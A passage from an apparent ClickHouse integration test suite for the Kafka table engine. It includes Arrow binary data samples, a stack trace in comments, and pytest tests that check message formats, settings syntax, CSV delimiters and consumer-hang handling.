# # /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ArrowBlockInputFormat, std::__1::allocator<DB::ArrowBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&, bool>(std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03f97 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ArrowBlockInputFormat>::value), std::__1::shared_ptr<DB::ArrowBlockInputFormat> >::type std::__1::make_shared<DB::ArrowBlockInputFormat, DB::ReadBuffer&, DB::Block const&, bool>(DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03d4c in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:117: DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1de0273f in /usr/bin/clickhouse
# # /contrib/libcxx/include/type_traits:3519: decltype(std::__1::forward<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&>(fp)(std::__1::forward<DB::ReadBuffer&>(fp0), std::__1::forward<DB::Block const&>(fp0), std::__1::forward<DB::RowInputFormatParams const&>(fp0), std::__1::forward<DB::FormatSettings const&>(fp0))) std::__1::__invoke<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de026da in /usr/bin/clickhouse
# # /contrib/libcxx/include/__functional_base:317: std::__1::shared_ptr<DB::IInputFormat> std::__1::__invoke_void_return_wrapper<std::__1::shared_ptr<DB::IInputFormat> >::__call<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de025ed in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1540: std::__1::__function::__alloc_func<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1, std::__1::allocator<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de0254a in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1714: std::__1::__function::__func<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1, std::__1::allocator<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de0165c in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1867: std::__1::__function::__value_func<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd14dbd in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:2473: std::__1::function<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd07035 in /usr/bin/clickhouse
# # /src/Formats/FormatFactory.cpp:258: DB::FormatFactory::getInputFormat(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, DB::ReadBuffer&, DB::Block const&, DB::Context const&, unsigned long, std::__1::function<void ()>) const @ 0x1dd04007 in /usr/bin/clickhouse
# # /src/Storages/Kafka/KafkaBlockInputStream.cpp:76: DB::KafkaBlockInputStream::readImpl() @ 0x1d8f6559 in /usr/bin/clickhouse
# # /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# # /src/DataStreams/copyData.cpp:26: void DB::copyDataImpl<DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)>(DB::IBlockInputStream&, DB::IBlockOutputStream&, DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)) @ 0x1c9ea01c in /usr/bin/clickhouse
# 'data_sample' : [
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# ],
# },
}
for format_name, format_opts in list(all_formats.items()):
print(('Set up {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
time.sleep(12)
for format_name, format_opts in list(all_formats.items()):
print(('Checking {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(name):
client = BrokerConnection('localhost', 9092, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
global kafka_id
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print(("kafka_id is {}".format(kafka_id)))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
wait_kafka_is_available()
# print("kafka is available - running test")
yield # run test
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
# Insert couple of malformed messages.
kafka_produce('new', ['}{very_broken_message,'])
kafka_produce('new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('new')
assert members[0]['client_id'] == 'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_issue11308(kafka_cluster):
# Check that matview does respect Kafka SETTINGS
kafka_produce('issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_issue4116(kafka_cluster):
# Check that format_csv_delimiter parameter works now - as part of all available format settings.
kafka_produce('issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_consumer_hang(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang',
kafka_group_name = 'consumer_hang',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
time.sleep(10)
instance.query('SELECT * FROM test.view')
# This should trigger heartbeat fail,
# which will trigger REBALANCE_IN_PROGRESS,
# and which can lead to consumer hang.
kafka_cluster.pause_container('kafka1')
time.sleep(0.5)
kafka_cluster.unpause_container('kafka1')
# print("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# original problem appearance was a sequence of the following messages in librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# so it was waiting forever while the application will execute queued rebalance callback
